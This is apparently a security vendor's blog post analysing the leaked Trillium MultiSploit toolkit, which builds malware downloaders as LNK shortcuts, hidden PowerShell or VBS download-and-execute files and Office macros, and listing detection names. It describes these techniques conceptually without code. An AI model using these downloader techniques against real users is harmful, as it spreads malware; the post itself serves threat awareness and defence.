Trillium Toolkit Leads to Widespread Malware

This blog was written by Oliver Devane and Mohinder Gill.

Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.

tril_010316_001

Trillium was created by a coder using the same name. The program contains a EULA that mentions it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.

tril_010316_002

In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.

.tril_010316_003

Version 1 of this this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.

tril_010316_004

This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that uses PowerShell to execute.

tril_010316_005

This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.

A silent exploit creates a file that downloads and executes a specified file from the Internet. The users have the option to create the following file types:

*.chm,*.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A Powershell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed as hidden, downloads and runs a file.

tril_010316_007

The Visual Basic executable downloads and executes a file.

tril_010316_011

The Visual Basic script again downloads and executes a file.

tril_010316_032

Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro versions, for example:

tril_010316_013

We have already observed this toolkit being used to distribute malware. We have seen spam campaigns using the macro exploit component, for example:

tril_010316_014

Detection
Intel Security has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections seen by malware created by this toolkit.

The post Trillium Toolkit Leads to Widespread Malware appeared first on McAfee.